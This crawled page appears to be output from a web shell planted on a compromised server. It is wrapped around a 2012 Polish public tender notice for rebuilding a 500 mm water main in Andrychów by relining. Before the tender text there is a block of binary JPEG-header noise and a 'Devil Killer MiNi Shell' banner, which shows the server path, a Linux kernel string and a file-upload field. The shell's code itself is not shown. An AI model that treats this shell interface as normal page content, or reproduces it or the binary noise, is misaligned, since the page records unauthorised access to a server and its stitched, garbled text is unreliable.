JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/325184-N-2012.html

<p class="kh_header"><b>Andrychów: Kontrakt XI - Zad. 1 Przebudowa wodociągu D500 metodą reliningu w ramach     projektu Budowa i Modernizacja Systemu Gospodarki Wodno-Ściekowej w Gminie    Andrychów</b><br>
<b>Numer ogłoszenia: 325184 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Sp. z o.o. , ul. Batorego 68, 34-120 Andrychów, woj. małopolskie, tel. 033 8752640, 8752655, faks 033 8752640, 8752655.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrakt XI - Zad. 1 Przebudowa wodociągu D500 metodą reliningu w ramach     projektu Budowa i Modernizacja Systemu Gospodarki Wodno-Ściekowej w Gminie    Andrychów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
Zadanie polegać będzie na przebudowie rurociągu przesyłowego wody o średnicy 500 mm na trasie  Czaniec (zbiornik retencyjny Sosina) - Andrychów (pompownia przy ul. Żwirki i Wigury) poprzez  wprowadzenie do istniejącej rury stalowej przewodu z PE o mniejszej średnicy.

Zakres robót obejmuje:
mechaniczne czyszczenie wnętrza istniejącego rurociągu stalowego ze złogów i rdzy oraz przepłukanie rurociągu po czyszczeniu

odcinkowe wprowadzenie do rurociągu stalowego przewodu z PE na płozach systemowych w rozstawach co 2,5mb 

na załomach, przy węzłach sieciowych i w punktach pośrednich wykonanie wykopów umożliwiających prowadzenie prac oraz wykonanie połączeń 

wykonanie kilku wyprowadzeń rurociągów rozdzielczych oraz pojedynczych przyłączy zasilanych z przebudowywanego rurociągu, 

układanie sukcesywnie - na długości kilku kolejnych odcinków robót - rurociągu tymczasowego zapewniającego zaopatrzenie w wodę na czas prowadzenia robót.

Parametry określające przedmiot zamówienia:

Długość rurociągu przewidzianego do przebudowy wynosi łącznie 3465 mb. 
w tym: 
530 mb na terenie Czańca
2935 mb na terenie Roczyn i Andrychowa
Dobór materiałów: 
-sieć ciśnieniowa PE, system PE100, SDR17, PN10, rury wzmocnione według wymogów podanych w specyfikacji szczegółowej -2144mb
-sieć ciśnieniowa PE, system PE100, SDR11, PN16, rury wzmocnione według wymogów podanych w specyfikacji szczegółowej -1350mb
a ponadto: PE Dz 200mm PE100, SDR17, PN10 -17mb
PE Dz 160mm PE100, SDR17, PN10 -5mb
PE Dz 110mm PE100, SDR17, PN10 -50mb
PE Dz 90mm PE100, SDR17, PN10 - 50 mb
PE Dz 63mm PE100, SDR17, PN10 -50mb
PE Dz 50mm PE100, SDR17, PN10 -50mb
PE Dz 40mm PE100, SDR17, PN10 - 50mb
Rurociąg tymczasowy PE Dz 315mm, PE100, SDR17, PN10 -1000mb wraz z przynależnymi węzłami armaturowymi.

Szczegółowy opis przedmiotu zamówienia został określony w Części III - Opis przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o ktorych mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych dotychczasowemu Wykonawcy robót budowlanych w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.00.00-8, 45.23.10.00-5, 45.23.11.00-6, 45.23.11.10-9, 45.23.11.11-6, 45.23.11.12-3, 45.23.11.13-0, 45.23.20.00-2, 45.11.12.00-0, 45.11.12.30-9, 45.11.12.40-2, 45.11.20.00-5, 45.11.21.00-6, 45.11.22.00-7, 45.11.22.10-0, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w następującej wysokości: 25 000 zł 
(słownie: dwadzieścia pięć tysięcy złotych 00/100) 
Wadium może być wniesione w jednej lub kilku następujących formach:
a) w pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2000r. Nr 109 poz. 1158 z późn. .zmian).
W przypadku, gdy wadium zostanie złożone przez Wykonawcę w formie: 
gwarancji/poręczenia, dokument taki musi być nieodwołalny, bezwarunkowy i płatny na pierwsze pisemne żądanie Zamawiającego. 
Dokument ten będzie zawierać następujące elementy:
a) nazwę i adres Wykonawcy (dającego zlecenie)  
b) nazwę i adres Zamawiającego (beneficjenta gwarancji/poręczenia) 
c) nazwę i adres gwaranta/poręczyciela 
d) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
e) kwotę gwarancji lub poręczenia,
f)  termin ważności gwarancji lub poręczenia,
g) zobowiązanie gwaranta lub poręczyciela do: 
zapłacenia kwoty gwarancji lub poręczenia  na pierwsze pisemne żądanie Zamawiającego, zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
odmówił podpisania umowy na warunkach określonych w ofercie, lub
nie wniósł zabezpieczenia należytego wykonania umowy, lub
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
a także w przypadku gdy Wykonawca:
w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert wskazanego w Rozdziale 19 do niniejszej  IDW.
W przypadku wniesienia przez Wykonawcę wadium w formie gwarancji/poręczenia do  oferty należy dołączyć kserokopię dokumentu poświadczoną za zgodność z oryginałem  przez Wykonawcę, przy czym oryginał tego dokumentu należy złożyć w kasie Zamawiającego przed upływem terminu składania ofert.
Zamawiający dopuszcza możliwość przesłania pocztą lub za pomocą kuriera na adres Zamawiającego oryginału dokumentu wadium jednak w osobnej kopercie nie związanej z ofertą oznaczonej w sposób jednoznacznie wskazujący, że jest to wadium przeznaczone na zabezpieczenie oferty Wykonawcy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:
 
	PKO BP S.A.  03 1020 2430 0000 8502 0048 3909

Za skutecznie wniesione wadium w formie pieniądza Zamawiający uzna wadium, które znajdzie się na rachunku Zamawiającego przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań w tym zakresie.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków na formularzu wg wzoru - Załącznik nr 2 do IDW.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 10 do IDW według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania (z zastrzeżeniem art. 26 ust. 3 ustawy Pzp)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków na formularzu wg wzoru - Załącznik nr 2 do IDW a ponadto wykaże, że 
w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane o łącznej długości co najmniej 3 km polegające na budowie lub przebudowie sieci wodociągowej o średnicy minimum 250mm metodą reliningu.
Fakt wykonania takich robót musi być potwierdzony dokumentem (np. w formie referencji), że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 10 do IDW według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania (z zastrzeżeniem art. 26 ust. 3 ustawy Pzp).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
spełnienie warunku wiedzy i doświadczenia będzie oceniane łącznie.
Dokument określony w Rozdziale 10 pkt. 1.2 może być złożony przez tego lub tych z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań w tym zakresie.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków na formularzu wg wzoru - Załącznik nr 2 do IDW.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 10 do IDW według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania (z zastrzeżeniem art. 26 ust. 3 ustawy Pzp)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków na formularzu wg wzoru - Załącznik nr 2 do IDW a ponadto przedstawi:
wykaz następujących osób, które będą uczestniczyć w wykonaniu zamówienia:
a) Osoba, która będzie pełnić funkcję Kierownika budowy
posiadająca doświadczenie zawodowe: 
minimum 5-letnie doświadczenie jako kierownik budowy lub kierownik robót z zakresu infrastruktury wodociągowo-kanalizacyjnej,
posiadająca uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  bez ograniczeń (zgodnie z Rozporządzeniem  Ministra Transportu i Budownictwa z dnia  28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r.  Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane  na podstawie wcześniej obowiązujących przepisów oraz aktualne zaświadczenie o wpisie na  listę właściwej izby samorządu zawodowego
b) Osoba, która będzie pełnić funkcję Kierownika robót w zakresie robót sanitarnych
posiadająca doświadczenie zawodowe: 
minimum 3-letnie doświadczenie jako kierownik budowy lub kierownik robót z zakresu infrastruktury wodociągowo-kanalizacyjnej,
posiadająca uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  bez ograniczeń (zgodnie z Rozporządzeniem  Ministra Transportu i Budownictwa z dnia  28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r.  Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane  na podstawie wcześniej obowiązujących przepisów oraz aktualne zaświadczenie o wpisie na  listę właściwej izby samorządu zawodowego.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 10 do IDW według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania (z zastrzeżeniem art. 26 ust. 3 ustawy Pzp)
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia będzie oceniane łącznie.
Dokumenty określone w Rozdziale 10 pkt. 1.3 i 1.4 może być złożony przez tego lub tych z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków na formularzu wg wzoru - Załącznik nr 2 do IDW a ponadto wykaże że:
posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 
1 000 000zł
posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 2 000 000 zł
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 10 do IDW według formuły spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania (z zastrzeżeniem art. 26 ust. 3 ustawy Pzp).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
spełnienie warunku sytuacji ekonomicznej i finansowej będzie oceniane łącznie.
Dokumenty określone w Rozdziale 10 pkt. 1.5 i 1.6 może być złożony przez tego lub tych z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy sporządzony na podstawie wzoru stanowiącego Załącznik nr 1 do IDW
2) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone na podstawie wzoru stanowiącego Załącznik nr 2 do IDW.
3) Oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp sporządzone na podstawie wzoru stanowiącego Załącznik nr 3a do IDW (dotyczy wyłącznie osób fizycznych prowadzących działalność gospodarczą)
4) Pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonych w  ofercie dokumentów (tj. odpisu z właściwego rejestru)
